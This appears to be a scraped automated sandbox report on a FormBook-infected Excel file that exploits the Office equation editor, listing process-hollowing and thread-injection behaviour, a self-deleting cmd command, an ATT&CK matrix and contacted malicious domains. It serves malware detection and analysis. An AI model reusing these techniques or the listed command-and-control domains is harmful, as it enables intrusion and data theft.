      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1388Jump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 20000Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000007.00000000.2208966407.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information31Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Extra Window Memory Injection1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452641 Sample: Form BA.xlsx Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 37 www.800pls.info 2->37 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 14 other signatures 2->59 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 34 36 2->15         started        signatures3 process4 dnsIp5 39 3.121.113.175, 49165, 80 AMAZON-02US United States 10->39 31 C:\Users\user\AppData\Local\...\pool[1].exe, PE32 10->31 dropped 33 C:\Users\Public\vbc.exe, PE32 10->33 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->79 17 vbc.exe 10->17         started        35 C:\Users\user\Desktop\~$Form BA.xlsx, data 15->35 dropped file6 signatures7 process8 signatures9 47 Machine Learning detection for dropped file 17->47 49 Tries to detect virtualization through RDTSC time measurements 17->49 51 Injects a PE file into a foreign processes 17->51 20 vbc.exe 17->20         started        process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 20->61 63 Maps a DLL or memory area into another process 20->63 65 Sample uses process hollowing technique 20->65 67 Queues an APC in another process (thread injection) 20->67 23 rundll32.exe 20->23         started        26 explorer.exe 20->26 injected process12 dnsIp13 69 Modifies the context of a thread in another process (thread injection) 23->69 71 Maps a DLL or memory area into another process 23->71 73 Tries to detect virtualization through RDTSC time measurements 23->73 29 cmd.exe 23->29         started        41 intoxickiss.com 151.101.0.119, 49167, 80 FASTLYUS United States 26->41 43 www.pon.xyz 26->43 45 2 other IPs or domains 26->45 75 System process connects to network (likely due to code injection or exploit) 26->75 77 Performs DNS queries to domains with low reputation 26->77 signatures14 process15

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Form BA.xlsx31%VirustotalBrowse
      Form BA.xlsx30%ReversingLabsWin32.Exploit.CVE-2017-11882

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe100%Joe Sandbox ML
      C:\Users\Public\vbc.exe100%Joe Sandbox ML

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      6.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      6.2.vbc.exe.8967b0.2.unpack100%AviraTR/ATRAPS.GenDownload File
      6.3.vbc.exe.8967b0.0.unpack100%AviraTR/ATRAPS.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.google.com.br/0%Avira URL Cloudsafe
      http://www.mercadolivre.com.br/0%URL Reputationsafe
      http://www.mercadolivre.com.br/0%URL Reputationsafe
      http://www.mercadolivre.com.br/0%URL Reputationsafe
      http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
      http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
      http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
      http://www.dailymail.co.uk/0%URL Reputationsafe
      http://www.dailymail.co.uk/0%URL Reputationsafe
      http://www.dailymail.co.uk/0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      www.gaigoilaocai.com/wufn/0%Avira URL Cloudsafe
      http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
      http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
      http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
      http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
      http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
      http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
      http://www.google.com.tw/0%Avira URL Cloudsafe
      http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
      http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
      http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
      http://it.search.dada.net/favicon.ico0%URL Reputationsafe
      http://it.search.dada.net/favicon.ico0%URL Reputationsafe
      http://it.search.dada.net/favicon.ico0%URL Reputationsafe
      http://search.hanafos.com/favicon.ico0%URL Reputationsafe
      http://search.hanafos.com/favicon.ico0%URL Reputationsafe
      http://search.hanafos.com/favicon.ico0%URL Reputationsafe
      http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
      http://www.abril.com.br/favicon.ico0%URL Reputationsafe
      http://www.abril.com.br/favicon.ico0%URL Reputationsafe
      http://www.abril.com.br/favicon.ico0%URL Reputationsafe
      http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
      http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
      http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
      http://buscar.ozu.es/0%URL Reputationsafe
      http://buscar.ozu.es/0%URL Reputationsafe
      http://buscar.ozu.es/0%URL Reputationsafe
      http://busca.igbusca.com.br/0%URL Reputationsafe
      http://busca.igbusca.com.br/0%URL Reputationsafe
      http://busca.igbusca.com.br/0%URL Reputationsafe
      http://search.auction.co.kr/0%URL Reputationsafe
      http://search.auction.co.kr/0%URL Reputationsafe
      http://search.auction.co.kr/0%URL Reputationsafe
      http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
      http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
      http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
      http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
      http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
      http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
      http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
      http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
      http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
      http://google.pchome.com.tw/0%URL Reputationsafe
      http://google.pchome.com.tw/0%URL Reputationsafe
      http://google.pchome.com.tw/0%URL Reputationsafe
      http://www.ozu.es/favicon.ico0%URL Reputationsafe
      http://www.ozu.es/favicon.ico0%URL Reputationsafe
      http://www.ozu.es/favicon.ico0%URL Reputationsafe
      http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
      http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
      http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
      http://www.gmarket.co.kr/0%URL Reputationsafe
      http://www.gmarket.co.kr/0%URL Reputationsafe
      http://www.gmarket.co.kr/0%URL Reputationsafe
      http://searchresults.news.com.au/0%URL Reputationsafe
      http://searchresults.news.com.au/0%URL Reputationsafe
      http://searchresults.news.com.au/0%URL Reputationsafe
      http://www.asharqalawsat.com/0%URL Reputationsafe
      http://www.asharqalawsat.com/0%URL Reputationsafe
      http://www.asharqalawsat.com/0%URL Reputationsafe
      http://search.yahoo.co.jp0%URL Reputationsafe
      http://search.yahoo.co.jp0%URL Reputationsafe
      http://search.yahoo.co.jp0%URL Reputationsafe
      http://buscador.terra.es/0%URL Reputationsafe
      http://buscador.terra.es/0%URL Reputationsafe
      http://buscador.terra.es/0%URL Reputationsafe
      http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
      http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
      http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
      http://www.iask.com/0%URL Reputationsafe
      http://www.iask.com/0%URL Reputationsafe
      http://www.iask.com/0%URL Reputationsafe
      http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
      http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
      http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
      http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
      http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
      http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
      http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
      http://service2.bfast.com/0%URL Reputationsafe
      http://service2.bfast.com/0%URL Reputationsafe
      http://service2.bfast.com/0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      71822.bodis.com
      		199.59.242.153
      		truefalse
        		high
        intoxickiss.com
        		151.101.0.119
        		truetrue
          		unknown
          www.800pls.info
          		unknown
          		unknowntrue
            		unknown
            www.pon.xyz
            		unknown
            		unknowntrue
              		unknown
              www.intoxickiss.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.gaigoilaocai.com/wufn/true
                • Avira URL Cloud: safe
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.google.com.br/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://search.chol.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                  		high
                  http://www.mercadolivre.com.br/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://search.ebay.de/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mtv.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.rambler.ru/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.nifty.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.dailymail.co.uk/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www3.fnac.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://buscar.ya.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://search.yahoo.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sogou.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://asp.usatoday.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://fr.search.yahoo.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://rover.ebay.comexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://in.search.yahoo.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://search.ebay.in/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://msk.afisha.ru/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.google.com.tw/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://search.rediff.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://www.windows.com/pctv.explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.ya.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://it.search.dada.net/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://search.naver.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://www.google.ru/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://search.hanafos.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.abril.com.br/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://search.daum.net/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://search.naver.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.clarin.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://buscar.ozu.es/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://kr.search.yahoo.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://search.about.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://busca.igbusca.com.br/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.ask.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.priceminister.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.cjmall.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://search.centrum.cz/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://suche.t-online.de/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.google.it/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://search.auction.co.kr/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.ceneo.pl/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.amazon.de/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://sads.myspace.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://google.pchome.com.tw/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://www.rambler.ru/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://uk.search.yahoo.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://espanol.search.yahoo.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.ozu.es/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://search.sify.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://openimage.interpark.com/interpark.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://search.ebay.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.gmarket.co.kr/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://search.nifty.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://searchresults.news.com.au/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.google.si/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.google.cz/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.soso.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.univision.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://api.twitter.com/1/direct_messages.xml?since_id=vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://search.ebay.it/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://busca.orange.es/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
